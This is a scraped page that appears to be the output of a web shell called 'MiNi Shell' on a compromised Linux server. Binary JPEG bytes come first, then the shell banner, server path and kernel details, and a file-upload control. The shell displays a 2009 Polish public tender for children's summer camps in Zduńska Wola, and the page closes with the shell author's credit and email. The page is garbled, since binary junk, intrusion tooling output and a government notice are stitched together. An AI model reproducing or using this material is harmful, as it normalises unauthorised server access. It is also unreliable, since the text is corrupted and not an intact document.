JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/147012-N-2009.html

<p class="kh_header"><b>Zduńska Wola: Zorganizowanie i przeprowadzanie kolonii letnich z programem profilaktyki uzależnień dla dzieci i młodzieży z terenu miasta Zduńska Wola.</b><br>
<b>Numer ogłoszenia: 147012 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zduńska Wola , ul. Stefana Złotnickiego 12, 98-220 Zduńska Wola, woj. łódzkie, tel. 043 8243136, 8254660, faks 043 8232605.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdunskawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzanie kolonii letnich z programem profilaktyki uzależnień dla dzieci i młodzieży z terenu miasta Zduńska Wola..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu kolonii letnich z programem profilaktyki uzależnień dla 110 dzieci i młodzieży z terenu miasta Zduńska Wola w wieku od 7 do 16 lat  w okresie od 29 czerwca do 22 sierpnia  2009 r. 
Czas trwania turnusu - 10 dób (10 noclegów i 10 pełnych dni żywieniowych). Doba trwa od obiadu dnia pierwszego i kończy się śniadaniem dnia następnego. Każdy turnus rozpoczyna się pierwszego dnia obiadem i kończy jedenastego dnia śniadaniem.
Ilość turnusów: uzależniona od możliwości Wykonawcy.
Liczba uczestników kolonii: 110 dzieci  i młodzieży.   
Zakwaterowanie dzieci, kadry wychowawców i kierownika kolonii w  budynku (budynkach) murowanym (w rozumieniu przepisów ustawy Prawo budowlane), z pełnym węzłem sanitarnym (natrysk, umywalka i wc ).
W każdym turnusie uczestniczyć będzie przedstawiciel Zamawiającego. W przypadku zorganizowania jednego turnusu przedstawicieli będzie dwóch. Wykonawca zapewni przedstawicielom odpowiednie warunki pracy, zakwaterowania oraz pokryje koszty ich pobytu (zakwaterowania   i wyżywienia). 
Lokalizacja kolonii: teren Polski, miejscowość położona w odległości nie mniejszej niż 100 km od Zduńskiej Woli   z zapewnieniem nieodpłatnego dostępu do strzeżonych kąpielisk  wodnych.
Zamawiający zastrzega, że zamówienie nie może być powierzone podwykonawcom, z wyjątkiem transportu dzieci.
Szczegółowy opis zamówienia w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.24.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Do udziału w przetargu dopuszczeni zostaną Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą wykazać, że warunek ten spełnia każdy Wykonawca.
2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki wynikające z art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj.:
1) posiadają  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)  posiadają wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
3. Wykonawcy ubiegający się o wykonanie zamówienia muszą spełniać niżej podane warunki: 
1) posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2) posiadają wpis do do rejestru organizatorów turystyki i pośredników turystycznych,
3) wykażą, że zrealizowali jako Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie-  co najmniej dwie usługi  odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia oraz załączą dokumenty potwierdzające, że usługi zostały wykonane należycie,
4) dysponują obiektem, który spełnia wymagania SIWZ i posiadają dla niego kartę kwalifikacyjną obiektu, zgodnie z wymogami Rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. (Dz. U. z 1997 r. Nr 12, poz. 67 z późn. zm.) na rok 2009 r.,
5) posiadają do dyspozycji kadrę z odpowiednim doświadczeniem (wychowawcy posiadający co najmniej 2 - letni staż i doświadczenie w pracy z dziećmi) i udokumentowanymi kwalifikacjami; jeden opiekun  (po przebytym odpowiednim szkoleniu) dla 20 lub 15 osobowej grupy dzieci (w zależności od wieku), kierownik kolonii (po przebytym odpowiednim szkoleniu)  oraz osoba/osoby  realizująca  program profilaktyki uzależnień -  (pedagog, socjoterapeuta, psycholog) legitymującymi się dyplomem wyższej uczelni i zaświadczeniem o ukończeniu szkolenia w zakresie profilaktyki uzależnień. Wykonawca zapewnia kierownika obiektu oraz kadrę medyczną (pielęgniarka obecna w ośrodku   24 godziny na dobę, lekarz pierwszego kontaktu na gotowość 24 godziny na dobę),
6) posiadają polisę ( a w przypadku jej braku inny dokument), ważną co najmniej na okres od dnia składania ofert do ostatniego dnia trwania kolonii potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej za szkody wyrządzone w związku z prowadzoną działalnością gospodarczą,
7) przedstawią pisemny program kolonii zapewniający właściwą organizację zajęć z dziećmi  (zajęcia sportowe, świetlicowe, krajoznawcze, kulturalne itp.),
8) przedstawią pisemny program profilaktyki uzależnień obejmujący bloki tematyczne w zakresie relacji interpersonalnych, kształtowania umiejętności w zakresie rozwiązywania problemów uzależnień, stresu, agresji i innych emocji oraz zagrożeń płynących z kontaktu dzieci i młodzieży ze środkami psychoaktywnymi. Realizacja programu podczas kolonii: codziennie, co najmniej 1,5 godziny w grupach liczących maksymalnie 20 osób przez cały czas trwania turnusu.  
4. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie przedmiotu zamówienia.
5.Kryteria dopuszczenia do uczestnictwa w przetargu lub wykluczenia z niego obowiązują wszystkich ubiegających się o udzielenie zamówienia, wszystkich partnerów występujących wspólnie. 
6. Zamawiający zastrzega, że zamówienie nie może być powierzone podwykonawcom, za wyjątkiem transportu dzieci.
7. Opis sposobu dokonywania oceny spełniania warunków przystąpienia do postępowania:
1) ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w n/w dokumentach i oświadczeniach na zasadzie  spełnia - nie spełnia,
2) z treści złożonych dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W ofercie, pod rygorem wykluczenia Wykonawcy z postępowania przetargowego i odrzucenia oferty, muszą być zamieszczone następujące oświadczenia i dokumenty:
1)  wypełniony formularz oferty zgodny w treści ze wzorem stanowiącym załącznik nr 1 do SIWZ, 
2) wypełniony formularz cenowy  zgodny w treści ze wzorem stanowiącym załącznik nr 2 do SIWZ, 
3) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik Nr 3 do SIWZ,Wykonawcy występujący wspólnie, składają oświadczenie, każdy odrębnie,  
4) odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,Wykonawcy występujący wspólnie, składają odpowiedni dokument, każdy odrębnie,  
5) wykaz wykonanych  usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o  udzielenie zamówienia; a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; Wykonawcy muszą wykazać, że wykonali co najmniej dwie usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia,  zgodnie  z załącznikiem nr 4 do SIWZ. W przypadku składania oferty przez podmioty występujące wspólnie, ww. warunek musi spełniać co najmniej jeden podmiot,
6) dokumenty potwierdzające, że podane w wykazie  usługi, o których mowa w pkt 5) zostały wykonane należycie np. referencje od poprzednich zamawiających. W przypadku składania oferty przez podmioty występujące wspólnie, ww. warunek musi spełniać co najmniej jeden podmiot,
7) wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w jego wykonywaniu z uprawnieniami wymaganymi przepisami prawa oraz danymi na temat ich doświadczenia i kwalifikacji niezbędnych do wykonywania zamówienia, a także zakres wykonywanych przez nich czynności w ramach umowy na organizację kolonii letnich z programem profilaktyki uzależnień, zgodnie z załącznikiem nr 5 do SIWZ, w tym kierownika kolonii oraz kadry medycznej (pielęgniarka obecna w ośrodku  24 godziny na dobę, lekarz pierwszego kontaktu na gotowość 24 godziny na dobę). Wykonawca zapewnia kierownika obiektu. W przypadku składania oferty przez podmioty występujące wspólnie, ww. warunek musi spełniać co najmniej jeden podmiot, 
8) dokumenty potwierdzające uprawnienia (kwalifikacje zawodowe) osób wymienionych w wykazie, o którym mowa w pkt 7) do wykonywania czynności, zgodnie z właściwymi przepisami prawa, 
9) zaakceptowany i podpisany projekt umowy o udzielnie zamówienia publicznego - załącznik nr 6 do SIWZ,
10) aktualną informację, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy Prawo zamówień publicznych,
11) aktualną informację, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 (dotyczy podmiotów zbiorowych)  ustawy Prawo zamówień publicznych,
12) zaświadczenie marszałka województwa, o wpisie do rejestru organizatorów turystyki i pośredników turystycznych województwa właściwego ze względu na siedzibę Wykonawcy. Wykonawcy występujący wspólnie, składają zaświadczenia, każdy odrębnie,  
13) polisę  ( a w przypadku jej braku inny dokument) ważną co najmniej na okres od dnia składania ofert do ostatniego dnia trwania kolonii potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej za szkody wyrządzone w związku z prowadzoną działalnością gospodarczą,   
14) aktualny dowód dysponowania obiektem przeznaczonym na kolonie (akt notarialny, umowa najmu, dzierżawy itp.),
15) pisemny program  kolonii zapewniający właściwą organizację zajęć z dziećmi  (zajęcia sportowe, świetlicowe, krajoznawcze, kulturalne itp.) z podziałem na każdy dzień pobytu, dostosowany do warunków pogodowych,
16)  pisemny program profilaktyki uzależnień  z podziałem na każdy dzień pobytu,
17) dokument potwierdzający prawo osoby (osób) podpisującej ofertę do reprezentowania Wykonawcy w postępowaniu o uzyskanie przedmiotowego zamówienia, ale tylko wtedy, kiedy prawo do reprezentowania Wykonawcy nie wynika z treści odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej,
18) informację dotyczącą podwykonawców,
19) potwierdzoną kartę kwalifikacyjną obiektu przez właściwe miejscowo Kuratorium Oświaty na rok 2009, 
20) oświadczenie o zapewnieniu przewozu dzieci do miejsca kolonii i z miejsca kolonii do Zduńskiej Woli bezpiecznym i sprawnym autokarem z jednoczesną gwarancją odpowiedniej opieki,
21) oświadczenie o zapewnieniu uczestnikom kolonii ubezpieczenia NW,
22) opis obiektu, w którym będą się odbywały kolonie (mile widziane zdjęcia).
Zamawiający zastrzega sobie prawo kontroli obiektu przed podpisaniem umowy z wybranym w drodze przetargu Wykonawcą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdunskawola.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zduńska Wola, ul. Stefana Złotnickiego 12 
98 - 220 Zduńska Wola 
budynek Nr 4, pokój Nr 413, (tel. 043 825-38-89)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 11:00, miejsce: Biuro Obsługi Mieszkańców Urzędu Miasta Zduńska Wola 
ul. Stefana Złotnickiego 12 
98 - 220 Zduńska Wola..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com